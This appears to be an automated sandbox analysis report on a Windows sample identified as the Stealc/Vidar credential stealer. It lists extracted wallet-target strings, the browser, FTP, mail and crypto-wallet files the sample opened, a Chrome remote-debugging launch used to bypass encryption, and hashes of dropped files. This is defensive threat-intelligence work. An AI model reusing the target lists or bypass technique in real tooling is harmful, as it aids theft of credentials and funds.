Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Documents\JDGIECGIEB.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1978262092.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1978262092.0000000000611000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC20C40 sqlite3_bind_zeroblob,	0_2_6CC20C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC20D60 sqlite3_bind_parameter_name,	0_2_6CC20D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB48EA0 sqlite3_clear_bindings,	0_2_6CB48EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC20B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CC20B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB46410 bind,WSAGetLastError,	0_2_6CB46410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB460B0 listen,WSAGetLastError,	0_2_6CB460B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4C030 sqlite3_bind_parameter_count,	0_2_6CB4C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB46070 PR_Listen,	0_2_6CB46070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CB4C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD22D0 sqlite3_bind_blob,	0_2_6CAD22D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB463C0 PR_Bind,	0_2_6CB463C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB49480 sqlite3_bind_null,	0_2_6CB49480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB494F0 sqlite3_bind_text16,	0_2_6CB494F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB494C0 sqlite3_bind_text,	0_2_6CB494C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB49400 sqlite3_bind_int64,	0_2_6CB49400

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1570634
Product:	CloudBasic
Start time:	15:05:10
Start date:	07.12.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	df2148240759f523a1f6222d9dde9593
SHA1:	909ac448b4c693897ad338a1584cd6b9e9bfecb8
SHA256:	c345aac946f217493e26b70406e93e028985d34c0575b087f208f3dd9c48075d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\BGCAFHCA	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	EFD26666EAE0E87B32082FF52F9F4C5E	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
C:\ProgramData\CBGHCAKKFBGDHJJJKECFBKKECG	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\EGIDBFBFHJDGCAKEGHJE	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\GHDAAKJE	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	64BCCF32ED2142E76D142DF7AAC75730	30AB1540F7909BEE86C0542B2EBD24FB73E5D629	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
C:\ProgramData\GHDBKFHIJKJKECAAAECA	ASCII text, with very long lines (1765), with CRLF line terminators	42594FD09C4DF3B174CF5D59B1CAB13A	1B78FEB748C36A592C468A76BB60E98187D7BE4A	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
C:\ProgramData\IIDAAFBGDBKJJJKFIIIJ	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\KFCFBAAEHCFHJJKEHJKJDHJDGI	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	85D6E1D7F82C11DAC40C95C06B7B5DC5	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0fd7f9a5-5aa5-40da-9800-03d02aca0234.tmp	JSON data	1CA7A2339BB472601C43AF40618502A8	24E57B6F6D5DDA56343A11534D37DC7D8ECF9159	FC2E40A644BFA4410AE0A4B25637A57C3E09CEFCFCEFF91B6E7430A2B7894835
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\241a70a0-a495-44f6-981f-22da2a778933.tmp	JSON data	E4A4B9B81549BDDD26F57C26703C3127	3ABD2641870EA6D334EFF27520864731B11EB99A	DCA70B22B38575501F256B0689769CE734952C0DD67C20740D714E44899586B0
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\91627f9e-148a-4fb1-8e17-6430c14b03fe.tmp	JSON data	E4A4B9B81549BDDD26F57C26703C3127	3ABD2641870EA6D334EFF27520864731B11EB99A	DCA70B22B38575501F256B0689769CE734952C0DD67C20740D714E44899586B0
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9ffd644f-9eb8-42c5-a2ac-0abe1863569e.tmp	JSON data	1A32012B3E92690DAE81A034934CA7BE	7B91C36AE1C9D96DB7C21B135C2FE303F7A46CA6	B1CA6C8356E67137AF061D1B31B3B38523534855041EC5FDC8B960E831E64ED5
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67545664-1B78.pma	data	F06992DF9D260ACCC7BFCA4D510058C9	32FDBBE8AC03C36EB9D4DF1FBB814A121BA6A6F8	36099A8C9D774AEC32395C9CD844E054FE42DE62B064790FD0D6743E9DE26EF2
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67545664-1E9C.pma	data	54E022A527DCD66BDAFFF75D9B379768	3A403A5BB488E48F0D19B9ED7ECA0CA9F08E36FD	1B43C5B4F600F4AC0A4332AE0F1BEBA44705112D201B3513213F51ED65675141
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat	data	B43C738AB1422F16D60B4C4B49CC7DF2	98C07F5F5E4F25C2BC0B2B5E6A3A2245F7D18215	C28208A8D5052C44515333D67BE35E9900BB0C1E68DECF8C8CDC8DB67DE51E4C
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version	ASCII text, with no line terminators	BF16C04B916ACE92DB941EBB1AF3CB18	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)	JSON data	1A32012B3E92690DAE81A034934CA7BE	7B91C36AE1C9D96DB7C21B135C2FE303F7A46CA6	B1CA6C8356E67137AF061D1B31B3B38523534855041EC5FDC8B960E831E64ED5
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF277b6.TMP (copy)	JSON data	1A32012B3E92690DAE81A034934CA7BE	7B91C36AE1C9D96DB7C21B135C2FE303F7A46CA6	B1CA6C8356E67137AF061D1B31B3B38523534855041EC5FDC8B960E831E64ED5
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF277c6.TMP (copy)	JSON data	1A32012B3E92690DAE81A034934CA7BE	7B91C36AE1C9D96DB7C21B135C2FE303F7A46CA6	B1CA6C8356E67137AF061D1B31B3B38523534855041EC5FDC8B960E831E64ED5
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF286f9.TMP (copy)	JSON data	1A32012B3E92690DAE81A034934CA7BE	7B91C36AE1C9D96DB7C21B135C2FE303F7A46CA6	B1CA6C8356E67137AF061D1B31B3B38523534855041EC5FDC8B960E831E64ED5
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF28708.TMP (copy)	JSON data	1A32012B3E92690DAE81A034934CA7BE	7B91C36AE1C9D96DB7C21B135C2FE303F7A46CA6	B1CA6C8356E67137AF061D1B31B3B38523534855041EC5FDC8B960E831E64ED5
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations	JSON data	265DB1C9337422F9AF69EF2B4E1C7205	3E38976BB5CF035C75C9BC185F72A80E70F41C2E	7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b3acb38a-f411-47af-9672-0b3ad9561d34.tmp	JSON data	1CA7A2339BB472601C43AF40618502A8	24E57B6F6D5DDA56343A11534D37DC7D8ECF9159	FC2E40A644BFA4410AE0A4B25637A57C3E09CEFCFCEFF91B6E7430A2B7894835
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\json[1].json	JSON data	3C9E1E6F8B87ED3CA13FA1A6C87D7BE7	2CECC652A6BDB7A9B191274DBEA6E971D6A780D4	210779B80EB55B5CA1200106921496502A0A19CEF6613B0BBC7BBEC900A3C51C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	04C18CB01E6A3734CE103ECDCC287EFA	555DC38073CB01B75CF53C43D8A546FB54D37AF8	FDAF97CDA146F6B4617421FE07DF788633205BEDC55260EFFE7C73128AA9D104
